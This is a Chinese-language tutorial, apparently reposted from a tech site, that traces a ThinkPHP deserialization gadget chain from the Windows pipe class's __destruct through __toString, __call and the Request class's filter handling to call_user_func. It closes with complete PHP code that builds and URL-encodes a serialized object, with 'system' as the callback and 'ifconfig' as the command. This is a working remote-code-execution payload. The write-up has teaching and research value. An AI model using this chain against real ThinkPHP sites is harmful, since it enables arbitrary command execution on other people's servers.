全网thinkPHP反序列化漏洞

三：ThinkPHP中的PHAR反序列化

  漏洞挖掘原理利用自动调用的魔术方法，一步一步去寻找调用链，寻找可控点，在unserialize和phar：//触发

1.漏洞起点为/pipes/windows.php中的__destruct（）中的 $this->removeFiles();

继续跟进它其中存在

if (file_exists($filename)) {

                @unlink($filename);

            }

，可以想到如果$filename为一个对象的话，而file_exists会将其变成字符串处理，从而触发————toString魔术方法。

2.全局搜索__toString,在Comversion.php中寻找到

public function __toString()

    {

        return $this->toJson();

    }

继续跟进tojson（）

public function toJson($options = JSON_UNESCAPED_UNICODE)

    {

        return json_encode($this->toArray(), $options);

    }

跟进toARrray（）

if (!empty($this->append)) {

            foreach ($this->append as $key => $name) {

                if (is_array($name)) {

                    // 追加关联对象属性

                    $relation = $this->getRelation($key);

                    if (!$relation) {

                        $relation = $this->getAttr($key);

                        $relation->visible($name);

                    }

跟进getArray（）

 public function getAttr($name, &$item = null)

    {

        try {

            $notFound = false;

            $value    = $this->getData($name);

        } catch (InvalidArgumentException $e) {

            $notFound = true;

            $value    = null;

        }

跟进getData（）

public function getData($name = null)

    {

        if (is_null($name)) {

            return $this->data;

        } elseif (array_key_exists($name, $this->data)) {

            return $this->data[$name];

        } elseif (array_key_exists($name, $this->relation)) {

            return $this->relation[$name];

        }

最后$relation=$this->data[$name],调用链基本完成，但没有执行点，这时想到$relation->visible($name);如果$relation这个类没有visible（$name）这个方法则会调用__call魔术方法，可以尝试。

public function __call($method, $args)

    {

        if (array_key_exists($method, $this->hook)) {

            array_unshift($args, $this);

            return call_user_func_array($this->hook[$method], $args);

        }

        throw new Exception('method not exists:' . static::class . '->' . $method);

    }

$this->hook可控，但是array_unshift($args, $this);会在数组前插入新的元素，很难构建payload，既然这个方法无法利用call_user_func_array($this->hook[$method], $args)，那为啥不直接用call_user_func_array($this->hook[$method], $args)调用本类存在的方法了。

假设this->hook[‘visible’=>[$this,method]]

那么call_user_func_array($this->hook[$method], $args)就会时

call_user_func_array([$this,method], $args)从而继续进行下去

继续寻找call_user_func（）找到

private function filterValue(&$value, $key, $filters)

    {

        $default = array_pop($filters);

        foreach ($filters as $filter) {

            if (is_callable($filter)) {

                // 调用函数或者方法过滤

                $value = call_user_func($filter, $value);

发现$filters参数那么谁在调用filterValue（）呢，发现cookie（）再继续调用

其中

        $filter = $this->getFilter($filter, $default);

 

跟进getFilter（），发现

 $filter = $filter ?: $this->filter;

其中将$filter = (array) $filter;变成了一个数组

最终call_user_func($filter, $value);第一个参数可控，寻找第二个参数$value，

找到input函数，继续寻找谁在调用input，发现params函数在调用而且

 return $this->input($this->param, $name, $default, $filter);

其中$this->param可控所以第二个参数值可控

filterValue(&$value, $key, $filters)->

public function input($data = [], $name = '', $default = null, $filter = ''){

$this->filterValue($data, $name, $filter);}->

public function param($name = '', $default = null, $filter = '')

{ return $this->input($this->param, $name, $default, $filter);}

但如果想进行到这一步$name不能为空因为在input（）函数中存在

if (false === $name) {

            // 获取原始数据

            return $data;

        }

所以我们要给$name赋值，最终寻找到isAjax（）函数

public function isAjax($ajax = false)

 {

 $result= $this->param($this->config['var_ajax']) ? true : $result;

        return $result;

    }

在isAjax函数中，我们可以控制$this->config['var_ajax']，$this->config['var_ajax']可控就意味着param函数中的$name可控。param函数中的$name可控就意味着input函数中的$name可控。

根据调用链尝试构建payload

namespace think;

class Request

{

    protected $hook = [];

    protected $config = [];

    protected $filter;

    protected $param = [];

    public function __construct(){

        $this->filter = 'system';                       // 要调用的函数

        $this->param = ['ifconfig'];                    // 要执行的命令

        $this->hook = ['visible'=>[$this, 'isAjax']];   // 要在__call中调用的方法

        $this->config = ['var_ajax' => ''];             // 配置参数，可控点

    }

}

abstract class Model{

    protected $append = [];     // 参考Converstion类的相同定义

    private $data = [];         // 参数Attribute类的相同定义

    function __construct()      // 给两个属性赋值

    {

        $this->append = ['woniu' => ['a']];  // 截止目前append只需要满足不为空，所以任意定义, Conversion 166 行

        $this->data = ['woniu' => new Request() ]; // 此处data的定义要绕一些，因为存在多个调用

    }

}

namespace think\model;

use think\Model;

class Pivot extends Model {

   

}

namespace think\process\pipes;

use think\model\Pivot;

class Pipes {}

class Windows extends Pipes{

    private $files = ['/opt/lampp/htdocs/security/upload/test.php'];

    function __construct() {

        $this->files = [new Pivot()];

    }

}

$w = new Windows();

echo urlencode(serialize($w));

这篇好文章是转载于：学新通技术网